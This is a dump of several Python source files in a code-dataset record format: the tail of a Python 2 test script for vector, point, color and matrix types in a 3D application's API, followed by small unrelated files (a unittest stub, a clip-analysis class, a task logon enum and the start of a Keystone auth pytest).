print repr(Vector([1, 2, 3]) + p)\n # Point([2.0, 4.0, 6.0])\n print repr(Point([1, 2, 3]) + p)\n # Point([2.0, 4.0, 6.0])\n print repr([1, 2, 3] + p)\n # Point([2.0, 4.0, 6.0])\n print repr([1, 2, 3, 1] + p)\n # Point([2.0, 4.0, 6.0])\n print repr(Point([1, 2, 3, 1]) + p)\n # Point([2.0, 4.0, 6.0])\n print repr([1, 2, 3, 2] + p)\n # Point([2.0, 4.0, 6.0, 3.0])\n print repr(Point([1, 2, 3, 2]) + p)\n # Point([1.5, 3.0, 4.5])\n\n # various operation, on cartesian and non cartesian points\n\n print \"p = Point(1, 2, 3)\"\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n print \"p/2\"\n print repr(p / 2)\n # Point([0.5, 1.0, 1.5])\n print \"p*2\"\n print repr(p * 2)\n # Point([2.0, 4.0, 6.0])\n print \"q = Point(0.25, 0.5, 1.0)\"\n q = Point(0.25, 0.5, 1.0)\n print repr(q)\n # Point([0.25, 0.5, 1.0])\n print repr(q + 2)\n # Point([2.25, 2.5, 3.0])\n print repr(q / 2)\n # Point([0.125, 0.25, 0.5])\n print repr(p + q)\n # Point([1.25, 2.5, 4.0])\n print repr(p - q)\n # Vector([0.75, 1.5, 2.0])\n print repr(q - p)\n # Vector([-0.75, -1.5, -2.0])\n print repr(p - (p - q))\n # Point([0.25, 0.5, 1.0])\n print repr(Vector(p) * Vector(q))\n # 4.25\n print repr(p * q)\n # 4.25\n print repr(p / q)\n # Point([4.0, 4.0, 3.0])\n\n print \"p = Point(1, 2, 3)\"\n p = Point(1, 2, 3)\n print repr(p)\n # Point([1.0, 2.0, 3.0])\n print \"p/2\"\n print repr(p / 2)\n # Point([0.5, 1.0, 1.5])\n print \"p*2\"\n print repr(p * 2)\n # Point([2.0, 4.0, 6.0])\n print \"q = Point(0.25, 0.5, 1.0, 0.5)\"\n q = Point(0.25, 0.5, 1.0, 0.5)\n print repr(q)\n # Point([0.25, 0.5, 1.0, 0.5])\n r = q.deepcopy()\n print repr(r)\n # Point([0.25, 0.5, 1.0, 0.5])\n print repr(r.cartesianize())\n # Point([0.5, 1.0, 2.0])\n print repr(r)\n # Point([0.5, 1.0, 2.0])\n print repr(q)\n # Point([0.25, 0.5, 1.0, 0.5])\n print repr(q.cartesian())\n # Point([0.5, 1.0, 2.0])\n r = q.deepcopy()\n print repr(r)\n # Point([0.25, 0.5, 1.0, 0.5])\n print repr(r.rationalize())\n # Point([0.5, 1.0, 2.0, 0.5])\n print repr(r)\n # Point([0.5, 1.0, 2.0, 0.5])\n print repr(q.rational())\n # Point([0.5, 1.0, 2.0, 0.5])\n r = q.deepcopy()\n print repr(r.homogenize())\n # Point([0.125, 0.25, 0.5, 0.5])\n print repr(r)\n # Point([0.125, 0.25, 0.5, 0.5])\n print repr(q.homogen())\n # Point([0.125, 0.25, 0.5, 0.5])\n print repr(q)\n # Point([0.25, 0.5, 1.0, 0.5])\n print Vector(q)\n # [0.5, 1.0, 2.0]\n print Vector(q.cartesian())\n # [0.5, 1.0, 2.0]\n # ignore w\n print \"q/2\"\n print repr(q / 2)\n # Point([0.125, 0.25, 0.5, 0.5])\n print \"q*2\"\n print repr(q * 2)\n # Point([0.5, 1.0, 2.0, 0.5])\n print repr(q + 2) # cartesianize is done by Vector add\n # Point([2.5, 3.0, 4.0])\n\n print repr(q)\n # Point([0.25, 0.5, 1.0, 0.5])\n print repr(p + Vector(1, 2, 3))\n # Point([2.0, 4.0, 6.0])\n print repr(q + Vector(1, 2, 3))\n # Point([1.5, 3.0, 5.0])\n print repr(q.cartesian() + Vector(1, 2, 3))\n # Point([1.5, 3.0, 5.0])\n\n print repr(p - q)\n # Vector([0.5, 1.0, 1.0])\n print repr(p - q.cartesian())\n # Vector([0.5, 1.0, 1.0])\n print repr(q - p)\n # Vector([-0.5, -1.0, -1.0])\n print repr(p - (p - q))\n # Point([0.5, 1.0, 2.0])\n print repr(Vector(p) * Vector(q))\n # 4.25\n print repr(p * q)\n # 4.25\n print repr(p / q) # need explicit homogenize as division not handled by api\n # Point([4.0, 4.0, 3.0, 2.0]) TODO : what do we want here ?\n # Vector([2.0, 2.0, 1.5])\n # additionnal methods\n\n print \"p = Point(x=1, y=2, z=3)\"\n p = Point(x=1, y=2, z=3)\n print p.length()\n # 3.74165738677\n print p[:1].length()\n # 1.0\n print p[:2].length()\n # 2.2360679775\n print p[:3].length()\n # 3.74165738677\n\n p = Point(1.0, 0.0, 0.0)\n q = Point(0.707, 0.0, -0.707)\n print repr(p)\n # Point([1.0, 0.0, 0.0, 1.0])\n print repr(q)\n # Point([0.707, 0.0, -0.707, 1.0])\n print repr(q - p)\n # Vector([-0.293, 0.0, -0.707])\n print repr(axis(Point.origin, p, q))\n # Vector([-0.0, 0.707, 0.0])\n print repr(Point.origin.axis(p, q))\n # Vector([-0.0, 0.707, 0.0])\n print repr(Point.origin.axis(q, p))\n # Vector([0.0, -0.707, 0.0])\n print angle(Point.origin, p, q)\n # 0.785398163397\n print angle(Point.origin, q, p)\n # 0.785398163397\n print Point.origin.angle(p, q)\n # 0.785398163397\n print p.distanceTo(q)\n # 0.765309087885\n print (q - p).length()\n # 0.765309087885\n print cotan(Point.origin, p, q)\n # 1.0\n # obviously True\n print planar(Point.origin, p, q)\n # True\n r = center(Point.origin, p, q)\n print repr(r)\n # Point([0.569, 0.0, -0.235666666667, 1.0])\n print planar(Point.origin, p, q, r)\n # True\n print planar(Point.origin, p, q, r + Vector(0.0, 0.1, 0.0))\n # False\n print bWeights(r, Point.origin, p, q)\n # (0.33333333333333337, 0.33333333333333331, 0.33333333333333343)\n\n p = Point([0.33333, 0.66666, 1.333333, 0.33333])\n print repr(round(p, 3))\n # Point([0.333, 0.667, 1.333, 0.333])\n\n print \"end tests Point\"\n\ndef _testMColor():\n\n print \"Color class\", dir(Color)\n print hasattr(Color, 'data')\n c = Color()\n print repr(c)\n # Color([0.0, 0.0, 0.0, 1.0])\n print \"Color instance\", dir(c)\n print hasattr(c, 'data')\n print repr(c.data)\n # Color([0.0, 0.0, 0.0, 1.0])\n c = Color(_api.MColor())\n print repr(c)\n # Color([0.0, 0.0, 0.0, 1.0])\n # using api convetion of single value would mean alpha\n # instead of VectorN convention of filling all with value\n # which would yield # Color([0.5, 0.5, 0.5, 0.5]) instead\n # This would break coerce behavior for Color\n print \"c = Color(0.5)\"\n c = Color(0.5)\n print repr(c)\n # Color([0.5, 0.5, 0.5, 0.5])\n print \"c = round(Color(128, quantize=255), 2)\"\n c = Color(128, quantize=255)\n print repr(c)\n # Color([0.501999974251, 0.501999974251, 0.501999974251, 0.501999974251])\n c = Color(255, 128, b=64, a=32, quantize=255)\n print repr(c)\n # Color([1.0 0.501999974251 0.250999987125 0.125490196078])\n\n print \"c = Color(1, 1, 1)\"\n c = Color(1, 1, 1)\n print repr(c)\n # Color([1.0, 1.0, 1.0, 1.0])\n print \"c = round(Color(255, 0, 255, g=128, quantize=255, mode='rgb'), 2)\"\n c = round(Color(255, 0, 255, g=128, quantize=255, mode='rgb'), 2)\n print repr(c)\n # Color([1.0, 0.5, 1.0, 1.0])\n\n print \"c = round(Color(255, b=128, quantize=255, mode='rgb'), 2)\"\n c = round(Color(255, b=128, quantize=255, mode='rgb'), 2)\n print repr(c)\n # Color([1.0, 1.0, 0.5, 1.0])\n print \"c = Color(1, 0.5, 2, 0.5)\"\n c = Color(1, 0.5, 2, 0.5)\n print repr(c)\n # Color([1.0, 0.5, 2.0, 0.5])\n print \"c = Color(0, 65535, 65535, quantize=65535, mode='hsv')\"\n c = Color(0, 65535, 65535, quantize=65535, mode='hsv')\n print repr(c)\n # Color([1.0, 0.0, 0.0, 1.0])\n print \"c.rgb\"\n print repr(c.rgb)\n # (1.0, 0.0, 0.0)\n print \"c.hsv\"\n print repr(c.hsv)\n # (0.0, 1.0, 1.0)\n d = Color(c, v=0.5, mode='hsv')\n print repr(d)\n # Color([0.5, 0.0, 0.0, 1.0])\n print repr(d.hsv)\n # (0.0, 1.0, 0.5)\n print \"c = Color(Color.blue, v=0.5)\"\n c = Color(Color.blue, v=0.5)\n print repr(c)\n # Color([0.0, 0.0, 0.5, 1.0])\n print \"c.hsv\"\n print c.hsv\n # (0.66666666666666663, 1.0, 0.5)\n c.r = 1.0\n print repr(c)\n # Color([1.0, 0.0, 0.5, 1.0])\n print \"c.hsv\"\n print c.hsv\n # (0.91666666666666663, 1.0, 1.0)\n\n print \"c = Color(1, 0.5, 2, 0.5).clamp()\"\n c = Color(1, 0.5, 2, 0.5).clamp()\n print repr(c)\n # Color([1.0, 0.5, 1.0, 0.5])\n print c.hsv\n # (0.83333333333333337, 0.5, 1.0)\n\n print \"Color(c, v=0.5)\"\n d = Color(c, v=0.5)\n print repr(d)\n # Color([0.5, 0.25, 0.5, 0.5])\n print \"d.hsv\"\n print d.hsv\n # (0.83333333333333337, 0.5, 0.5)\n\n print \"c = Color(0.0, 0.5, 1.0, 0.5)\"\n c = Color(0.0, 0.5, 1.0, 0.5)\n print repr(c)\n # Color(0.0, 0.5, 1.0, 0.5)\n print \"d = c.gamma(2.0)\"\n d = c.gamma(2.0)\n print repr(d)\n # Color([0.0, 0.25, 1.0, 0.5])\n\n print \"c = Color.red.blend(Color.blue, 0.5)\"\n c = Color.red.blend(Color.blue, 0.5)\n print repr(c)\n # Color([0.5, 0.0, 0.5, 1.0])\n print c.hsv\n # (0.83333333333333337, 1.0, 0.5)\n c = Color.red.hsvblend(Color.blue, 0.5)\n print repr(c)\n # Color([1.0, 0.0, 1.0, 1.0])\n print c.hsv\n # (0.83333333333333337, 1.0, 1.0)\n\n print \"c = Color(0.25, 0.5, 0.75, 0.5)\"\n c = Color(0.25, 0.5, 0.75, 0.5)\n print repr(c)\n # Color([0.25, 0.5, 0.75, 0.5])\n print \"d = Color.black\"\n d = Color.black\n print repr(d)\n # Color([0.0, 0.0, 0.0, 1.0])\n print \"c.over(d)\"\n print repr(c.over(d))\n # Color([0.125, 0.25, 0.375, 1.0])\n print \"d.over(c)\"\n print repr(d.over(c))\n # Color([0.0, 0.0, 0.0, 0.5])\n print \"c.premult()\"\n print repr(c.premult())\n # Color([0.125, 0.25, 0.375, 1.0])\n\n # herited from Vector\n\n print \"c = Color(0.25, 0.5, 1.0, 1.0)\"\n c = Color(0.25, 0.5, 1.0, 1.0)\n print repr(c)\n # Color([0.25, 0.5, 1.0, 1.0])\n print \"d = Color(2.0, 1.0, 0.5, 0.25)\"\n d = Color(2.0, 1.0, 0.5, 0.25)\n print repr(d)\n # Color([2.0, 1.0, 0.5, 0.25])\n print \"-c\"\n print repr(-c)\n # Color([-0.25, -0.5, -1.0, 1.0])\n print \"e = c*d\"\n e = c * d\n print repr(e)\n # Color([0.5, 0.5, 0.5, 0.25])\n print \"e + 2\"\n print repr(e + 2)\n # Color([2.5, 2.5, 2.5, 0.25])\n print \"e * 2.0\" # mult by scalar float is defined in api for colors and also multiplies alpha\n print repr(e * 2.0)\n # Color([1.0, 1.0, 1.0, 0.5])\n print \"e / 2.0\" # as is divide, that ignores alpha now for some reason\n print repr(e / 2.0)\n # Color([0.25, 0.25, 0.25, 0.25])\n print \"e+Vector(1, 2, 3)\"\n print repr(e + Vector(1, 2, 3))\n # Color([1.5, 2.5, 3.5, 0.25])\n # how to handle operations on colors ?\n # here behaves like api but does it make any sense\n # for colors as it is now ?\n print \"c+c\"\n print repr(c + c)\n # Color([0.5, 1.0, 2.0, 1.0])\n print \"c+d\"\n print repr(c + d)\n # Color([2.25, 1.5, 1.5, 1.0])\n print \"d-c\"\n print repr(d - c)\n # Color([1.75, 0.5, -0.5, 0.25])\n\n print \"end tests Color\"\n\ndef _testMMatrix():\n\n print \"Matrix class\", dir(Matrix)\n m = Matrix()\n print m.formated()\n #[[1.0, 0.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0, 0.0],\n # [0.0, 0.0, 1.0, 0.0],\n # [0.0, 0.0, 0.0, 1.0]]\n print m[0, 0]\n # 1.0\n print repr(m[0:2, 0:3])\n # [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]]\n print m(0, 0)\n # 1.0\n print \"Matrix instance:\", dir(m)\n print Matrix.__readonly__\n print Matrix.__slots__\n print Matrix.shape\n print Matrix.ndim\n print Matrix.size\n print m.shape\n print m.ndim\n print m.size\n # should fail\n m.shape = (4, 4)\n m.shape = 2\n\n print dir(Space)\n\n m = Matrix.identity\n # inherits from MatrixN --> Array\n print isinstance(m, MatrixN)\n # True\n print isinstance(m, Array)\n # True\n # as well as _api.Matrix\n print isinstance(m, _api.MMatrix)\n # True\n # accepted directly by API methods\n n = _api.MMatrix()\n m = n.setToProduct(m, m)\n print repr(m)\n print repr(n)\n\n # inits\n m = Matrix(range(16))\n print m.formated()\n #[[0.0, 1.0, 2.0, 3.0],\n # [4.0, 5.0, 6.0, 7.0],\n # [8.0, 9.0, 10.0, 11.0],\n # [12.0, 13.0, 14.0, 15.0]]\n M = Array(range(16), shape=(8, 2))\n m = Matrix(M)\n print m.formated()\n #[[0.0, 1.0, 2.0, 3.0],\n # [4.0, 5.0, 6.0, 7.0],\n # [8.0, 9.0, 10.0, 11.0],\n # [12.0, 13.0, 14.0, 15.0]]\n M = MatrixN(range(9), shape=(3, 3))\n m = Matrix(M)\n print m.formated()\n #[[0.0, 1.0, 2.0, 0.0],\n # [3.0, 4.0, 5.0, 0.0],\n # [6.0, 7.0, 8.0, 0.0],\n # [0.0, 0.0, 0.0, 1.0]]\n # inherits from MatrixN --> Array\n print isinstance(m, MatrixN)\n # True\n print isinstance(m, Array)\n # True\n # as well as _api.Matrix\n print isinstance(m, _api.MMatrix)\n # True\n # accepted directly by API methods\n n = _api.MMatrix()\n m = n.setToProduct(m, m)\n print repr(m)\n print repr(n)\n t = _api.MTransformationMatrix()\n t.setTranslation(Vector(1, 2, 3), _api.MSpace.kWorld)\n m = Matrix(t)\n print m.formated()\n #[[1.0, 0.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0, 0.0],\n # [0.0, 0.0, 1.0, 0.0],\n # [1.0, 2.0, 3.0, 1.0]]\n m = Matrix(m, a30=10)\n print m.formated()\n #[[1.0, 0.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0, 0.0],\n # [0.0, 0.0, 1.0, 0.0],\n # [10.0, 2.0, 3.0, 1.0]]\n # should fail\n print \"Matrix(range(20)\"\n try:\n m = Matrix(range(20))\n print m.formated()\n except:\n print \"will raise ValueError: cannot initialize a Matrix of shape (4, 4) from (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19), some information would be lost, use an explicit resize or trim\"\n\n m = Matrix.identity\n M = m.trimmed(shape=(3, 3))\n print repr(M)\n # MatrixN([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]])\n print M.formated()\n #[[1.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0],\n # [0.0, 0.0, 1.0]]\n try:\n m.trim(shape=(3, 3))\n except:\n print \"will raise TypeError: new shape (3, 3) is not compatible with class Matrix\"\n\n print m.nrow\n # 4\n print m.ncol\n # 4\n # should fail\n try:\n m.nrow = 3\n except:\n print \"will raise TypeError: new shape (3, 4) is not compatible with class Matrix\"\n print list(m.row)\n # [Array([1.0, 0.0, 0.0, 0.0]), Array([0.0, 1.0, 0.0, 0.0]), Array([0.0, 0.0, 1.0, 0.0]), Array([0.0, 0.0, 0.0, 1.0])]\n print list(m.col)\n # [Array([1.0, 0.0, 0.0, 0.0]), Array([0.0, 1.0, 0.0, 0.0]), Array([0.0, 0.0, 1.0, 0.0]), Array([0.0, 0.0, 0.0, 1.0])]\n\n m = Matrix(MatrixN(range(9), shape=(3, 3)).trimmed(shape=(4, 4), value=10))\n print m.formated()\n #[[0.0, 1.0, 2.0, 10.0],\n # [3.0, 4.0, 5.0, 10.0],\n # [6.0, 7.0, 8.0, 10.0],\n # [10.0, 10.0, 10.0, 10.0]]\n\n print m.get()\n # ((0.0, 1.0, 2.0, 10.0), (3.0, 4.0, 5.0, 10.0), (6.0, 7.0, 8.0, 10.0), (10.0, 10.0, 10.0, 10.0))\n print repr(m[0])\n # [0.0, 1.0, 2.0, 10.0]\n m[0] = 10\n print m.formated()\n #[[10.0, 10.0, 10.0, 10.0],\n # [3.0, 4.0, 5.0, 10.0],\n # [6.0, 7.0, 8.0, 10.0],\n # [10.0, 10.0, 10.0, 10.0]]\n print (10 in m)\n # True\n print list(m)\n # [Array([10.0, 10.0, 10.0, 10.0]), Array([3.0, 4.0, 5.0, 10.0]), Array([6.0, 7.0, 8.0, 10.0]), Array([10.0, 10.0, 10.0, 10.0])]\n print list(m.flat)\n # [10.0, 10.0, 10.0, 10.0, 3.0, 4.0, 5.0, 10.0, 6.0, 7.0, 8.0, 10.0, 10.0, 10.0, 10.0, 10.0]\n\n u = Vector.xAxis\n v = Vector.yAxis\n print Vector.xAxis\n print str(Vector.xAxis)\n print unicode(Vector.xAxis)\n print repr(Vector.xAxis)\n\n print \"u = Vector.xAxis:\"\n print repr(u)\n\n # trans matrix : t: 1, 2, 3, r: 45, 90, 30, s: 0.5, 1.0, 2.0\n m = Matrix([0.0, 4.1633363423443383e-17, -0.5, 0.0, 0.25881904510252079, 0.96592582628906831, 1.3877787807814459e-16, 0.0, 1.9318516525781366, -0.51763809020504159, 0.0, 0.0, 1.0, 2.0, 3.0, 1.0])\n print \"m:\"\n print round(m, 2).formated()\n #[[0.0, 0.0, -0.5, 0.0],\n # [0.26, 0.97, 0.0, 0.0],\n # [1.93, -0.52, 0.0, 0.0],\n # [1.0, 2.0, 3.0, 1.0]]\n\n x = Vector.xAxis\n y = Vector.yAxis\n z = Vector.zAxis\n u = Vector(1, 2, 3)\n print \"u:\"\n print repr(u)\n # Vector([1, 2, 3])\n print \"u*m\"\n print repr(u * m)\n # Vector([6.31319304794, 0.378937381963, -0.5])\n print \"m*u\"\n print repr(m * u)\n # Vector([-1.5, 2.19067069768, 0.896575472168])\n\n p = Point(1, 10, 100, 1)\n print \"p:\"\n print repr(p)\n # Point([1.0, 10.0, 100.0, 1.0])\n print \"p*m\"\n print repr(p * m)\n # Point([196.773355709, -40.1045507576, 2.5, 1.0])\n print \"m*p\"\n print repr(m * p)\n # Point([-50.0, 9.91807730799, -3.24452924947, 322.0])\n\n print \"v = [1, 2, 3]*m\"\n v = VectorN([1, 2, 3]) * m\n print repr(v)\n # VectorN([6.31319304794, 0.378937381963, -0.5])\n print \"v = [1, 2, 3, 1]*m\"\n v = VectorN([1, 2, 3, 1]) * m\n print repr(v)\n # VectorN([7.31319304794, 2.37893738196, 2.5, 1.0])\n # should fail\n print \"VectorN([1, 2, 3, 4, 5])*m\"\n try:\n v = VectorN([1, 2, 3, 4, 5]) * m\n except:\n print \"Will raise ValueError: vector of size 5 and matrix of shape (4, 4) are not conformable for a VectorN * MatrixN multiplication\"\n\n # herited\n\n print \"m = Matrix(range(1, 17))\"\n m = Matrix(range(1, 17))\n print m.formated()\n #[[1.0, 2.0, 3.0, 4.0],\n # [5.0, 6.0, 7.0, 8.0],\n # [9.0, 10.0, 11.0, 12.0],\n # [13.0, 14.0, 15.0, 16.0]]\n # element wise\n print \"[1, 10, 100]*m\"\n print repr([1, 10, 100] * m)\n # Matrix([[1.0, 20.0, 300.0, 0.0], [5.0, 60.0, 700.0, 0.0], [9.0, 100.0, 1100.0, 0.0], [13.0, 140.0, 1500.0, 0.0]])\n print \"M = MatrixN(range(20), shape=(4, 5))\"\n M = MatrixN(range(1, 21), shape=(4, 5))\n print M.formated()\n #[[1, 2, 3, 4, 5],\n # [6, 7, 8, 9, 10],\n # [11, 12, 13, 14, 15],\n # [16, 17, 18, 19, 20]]\n print \"m*M\"\n n = m * M\n print (n).formated()\n #[[110.0, 120.0, 130.0, 140.0, 150.0],\n # [246.0, 272.0, 298.0, 324.0, 350.0],\n # [382.0, 424.0, 466.0, 508.0, 550.0],\n # [518.0, 576.0, 634.0, 692.0, 750.0]]\n print util.clsname(n)\n # MatrixN\n print \"m*2\"\n n = m * 2\n print (n).formated()\n #[[2.0, 4.0, 6.0, 8.0],\n # [10.0, 12.0, 14.0, 16.0],\n # [18.0, 20.0, 22.0, 24.0],\n # [26.0, 28.0, 30.0, 32.0]]\n print util.clsname(n)\n # Matrix\n print \"2*m\"\n n = 2 * m\n print (n).formated()\n #[[2.0, 4.0, 6.0, 8.0],\n # [10.0, 12.0, 14.0, 16.0],\n # [18.0, 20.0, 22.0, 24.0],\n # [26.0, 28.0, 30.0, 32.0]]\n print util.clsname(n)\n # Matrix\n print \"m+2\"\n n = m + 2\n print (n).formated()\n #[[3.0, 4.0, 5.0, 6.0],\n # [7.0, 8.0, 9.0, 10.0],\n # [11.0, 12.0, 13.0, 14.0],\n # [15.0, 16.0, 17.0, 18.0]]\n print util.clsname(n)\n # Matrix\n print \"2+m\"\n n = 2 + m\n print (n).formated()\n #[[3.0, 4.0, 5.0, 6.0],\n # [7.0, 8.0, 9.0, 10.0],\n # [11.0, 12.0, 13.0, 14.0],\n # [15.0, 16.0, 17.0, 18.0]]\n print util.clsname(n)\n # Matrix\n try:\n m.setToProduct(m, M)\n except:\n print \"\"\"Will raise TypeError: cannot initialize a Matrix of shape (4, 4) from (Array([0, 1, 2, 3, 4]), Array([5, 6, 7, 8, 9]), Array([10, 11, 12, 13, 14]), Array([15, 16, 17, 18, 19])) of shape (4, 5),\n as it would truncate data or reduce the number of dimensions\"\"\"\n\n print m.isEquivalent(m * M)\n # False\n\n # trans matrix : t: 1, 2, 3, r: 45, 90, 30, s: 0.5, 1.0, 2.0\n m = Matrix([0.0, 4.1633363423443383e-17, -0.5, 0.0, 0.25881904510252079, 0.96592582628906831, 1.3877787807814459e-16, 0.0, 1.9318516525781366, -0.51763809020504159, 0.0, 0.0, 1.0, 2.0, 3.0, 1.0])\n print \"m:\"\n print round(m, 2).formated()\n #[[0.0, 0.0, -0.5, 0.0],\n # [0.26, 0.97, 0.0, 0.0],\n # [1.93, -0.52, 0.0, 0.0],\n # [1.0, 2.0, 3.0, 1.0]]\n print \"m.transpose():\"\n print round(m.transpose(), 2).formated()\n #[[0.0, 0.26, 1.93, 1.0],\n # [0.0, 0.97, -0.52, 2.0],\n # [-0.5, 0.0, 0.0, 3.0],\n # [0.0, 0.0, 0.0, 1.0]]\n print \"m.isSingular():\"\n print m.isSingular()\n # False\n print \"m.inverse():\"\n print round(m.inverse(), 2).formated()\n #[[0.0, 0.26, 0.48, 0.0],\n # [0.0, 0.97, -0.13, 0.0],\n # [-2.0, 0.0, 0.0, 0.0],\n # [6.0, -2.19, -0.22, 1.0]]\n print \"m.adjoint():\"\n print round(m.adjoint(), 2).formated()\n #[[0.0, 0.26, 0.48, 0.0],\n # [0.0, 0.97, -0.13, 0.0],\n # [-2.0, 0.0, -0.0, 0.0],\n # [6.0, -2.19, -0.22, 1.0]]\n print \"m.adjugate():\"\n print round(m.adjugate(), 2).formated()\n #[[0.0, 0.26, 0.48, 0.0],\n # [0.0, 0.97, -0.13, 0.0],\n # [-2.0, 0.0, -0.0, 0.0],\n # [6.0, -2.19, -0.22, 1.0]]\n print \"m.homogenize():\"\n print round(m.homogenize(), 2).formated()\n #[[0.0, 0.0, -1.0, 0.0],\n # [0.26, 0.97, 0.0, 0.0],\n # [0.97, -0.26, -0.0, 0.0],\n # [1.0, 2.0, 3.0, 1.0]]\n print \"m.det():\"\n print m.det()\n # 1.0\n print \"m.det4x4():\"\n print m.det4x4()\n # 1.0\n print \"m.det3x3():\"\n print m.det3x3()\n # 1.0\n print \"m.weighted(0.5):\"\n print round(m.weighted(0.5), 2).formated()\n #[[0.53, 0.0, -0.53, 0.0],\n # [0.09, 0.99, 0.09, 0.0],\n # [1.05, -0.2, 1.05, 0.0],\n # [0.5, 1.0, 1.5, 1.0]]\n print \"m.blend(Matrix.identity, 0.5):\"\n print round(m.blend(Matrix.identity, 0.5), 2).formated()\n #[[0.53, 0.0, -0.53, 0.0],\n # [0.09, 0.99, 0.09, 0.0],\n # [1.05, -0.2, 1.05, 0.0],\n # [0.5, 1.0, 1.5, 1.0]]\n\n print \"end tests Matrix\"\n\ndef _testMTransformationMatrix():\n\n q = Quaternion()\n print repr(q)\n # Quaternion([0.0, 0.0, 0.0, 1.0])\n q = Quaternion(1, 2, 3, 0.5)\n print repr(q)\n # Quaternion([1.0, 2.0, 3.0, 0.5])\n q = Quaternion(0.785, 0.785, 0.785, \"xyz\")\n print repr(q)\n # Quaternion([0.191357439088, 0.461717715523, 0.191357439088, 0.844737481223])\n\n m = Matrix()\n m.rotate = q\n print repr(m)\n # Matrix([[0.500398163355, 0.499999841466, -0.706825181105, 0.0], [-0.146587362969, 0.853529322022, 0.499999841466, 0.0], [0.853295859083, -0.146587362969, 0.500398163355, 0.0], [0.0, 0.0, 0.0, 1.0]])\n\n print \"TransformationMatrix class\", dir(TransformationMatrix)\n m = TransformationMatrix()\n print m.formated()\n #[[1.0, 0.0, 0.0, 0.0],\n # [0.0, 1.0, 0.0, 0.0],\n # [0.0, 0.0, 1.0, 0.0],\n # [0.0, 0.0, 0.0, 1.0]]\n print m[0, 0]\n # 1.0\n print m[0:2, 0:3]\n # [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]]\n print \"TransformationMatrix instance:\", dir(m)\n print TransformationMatrix.__readonly__\n print TransformationMatrix.__slots__\n print TransformationMatrix.shape\n print TransformationMatrix.ndim\n print TransformationMatrix.size\n print m.shape\n print m.ndim\n print m.size\n # should fail\n m.shape = (4, 4)\n m.shape = 2\n\n print dir(Space)\n\n m = TransformationMatrix.identity\n # inherits from MatrixN --> Array\n print isinstance(m, MatrixN)\n # True\n print isinstance(m, Array)\n # True\n # as well as _api.TransformationMatrix and _api.Matrix\n print isinstance(m, _api.MTransformationMatrix)\n # True\n print isinstance(m, _api.MMatrix)\n # True\n\n # accepted directly by API methods\n n = _api.MMatrix()\n n = n.setToProduct(m, m)\n print repr(n)\n\n n = _api.MTransformationMatrix()\n n = n.assign(m)\n print repr(n)\n\n m = TransformationMatrix.identity\n m.rotation = Quaternion()\n print repr(m)\n print m.formated()\n\n n = TransformationMatrix.identity\n n.translation = Vector(1, 2, 3)\n print n.formated()\n print repr(n)\n\n o = m * n\n print repr(o)\n print o.formated()\n\n print \"end tests TransformationMatrix\"\n\nif __name__ == '__main__':\n print Distance.getInternalUnit()\n # centimeters\n print Distance.getUIUnit()\n # centimeters\n Distance.setUIUnit('meters')\n print Distance.getUIUnit()\n # meters\n d = Distance(12)\n print d.unit\n # meters\n print d\n 1200.0\n print repr(d)\n Distance(12.0, unit='meters')\n print d.asUnit()\n 12.0\n print d.asInternalUnit()\n 1200.0\n\n import doctest\n doctest.testmod(verbose=True)\n\n _testMVector()\n _testMPoint()\n _testMColor()\n _testMMatrix()\n _testMTransformationMatrix()\n"} {"ext": "py", "sha": "1a301ff37e88e50ec5a25135e53b40398b1416e6", "content": "# report_tests.py\nimport unittest\nimport reporting as report\nfrom unittest.mock import MagicMock, Mock\n\n\nclass ReportTestSolver(unittest.TestCase):\n \"\"\"[summary]\n\n Args:\n unittest ([type]): [description]\n \"\"\"\n\n def nodes_error_reporting_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.nodes_error_reporting()\n\n def error_folder_created(self):\n \"\"\"[summary]\n \"\"\"\n pass\n\n def error_report_created(self):\n \"\"\"[summary]\n \"\"\"\n pass\n\n def plot_missing_data_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.plot_missing_data()\n\n def list_unique_values_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.list_unique_values()\n\n def print_column_info_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.print_column_info()\n\n def visualise_missing_counts_tests(self):\n \"\"\"[summary]\n \"\"\"\n report.visualise_missing_counts()\n"} {"ext": "py", "sha": "1a302137155acd572965bfc0e46523be33b80e40", "content": "from .probe import Probe\nfrom .utils import most_frequent, process_dict_list, merge_dicts\n\n\"\"\"\nAnalyses a group of clips.\n\"\"\"\nclass Analysis:\n def __init__(self, clips=[]):\n self.clips = clips\n\n def summary(self):\n file_summary = []\n for clip in self.clips:\n summary = Probe(clip).run().extract_summary()\n file_summary.append(summary)\n \n final_list = None\n\n for item in file_summary:\n if final_list == None:\n final_list = item\n else:\n final_list = merge_dicts(final_list, item)\n\n return process_dict_list(final_list, most_frequent)\n\n "} {"ext": "py", "sha": "1a3021b2904eedd3d9e140c1608d5f065fa72de3", "content": "from enum import Enum\n\n\nclass TaskLogonTypeEnum(Enum):\n \"\"\" \"\"\"\n\n TASK_LOGON_NONE = 0\n TASK_LOGON_PASSWORD = 1\n TASK_LOGON_S4U = 2\n TASK_LOGON_INTERACTIVE_TOKEN = 3\n TASK_LOGON_GROUP = 4\n TASK_LOGON_SERVICE_ACCOUNT = 5\n TASK_LOGON_INTERACTIVE_TOKEN_OR_PASSWORD = 6\n"} {"ext": "py", "sha": "1a3021eeb8268191c79085cea1a6a5a95d56b66d", "content": "##############################################################################\n# Copyright (c) 2017 ZTE Corp and others.\n#\n# All rights reserved. This program and the accompanying materials\n# are made available under the terms of the Apache License, Version 2.0\n# which accompanies this distribution, and is available at\n# http://www.apache.org/licenses/LICENSE-2.0\n##############################################################################\nimport os\n\nimport pytest\n\nfrom deploy.post.keystoneauth import Keystoneauth\n\n\n@pytest.mark.parametrize('openrc, expected', [\n ('/etc/kolla/admin-openrc.sh', '/etc/kolla/admin-openrc.sh'),\n (None, '/etc/kolla/admin-openrc.sh')])\ndef test_create_Keystoneauth_instance(openrc, expected):\n KeystoneClient = Keystoneauth(openrc)\n assert KeystoneClient.openrc == 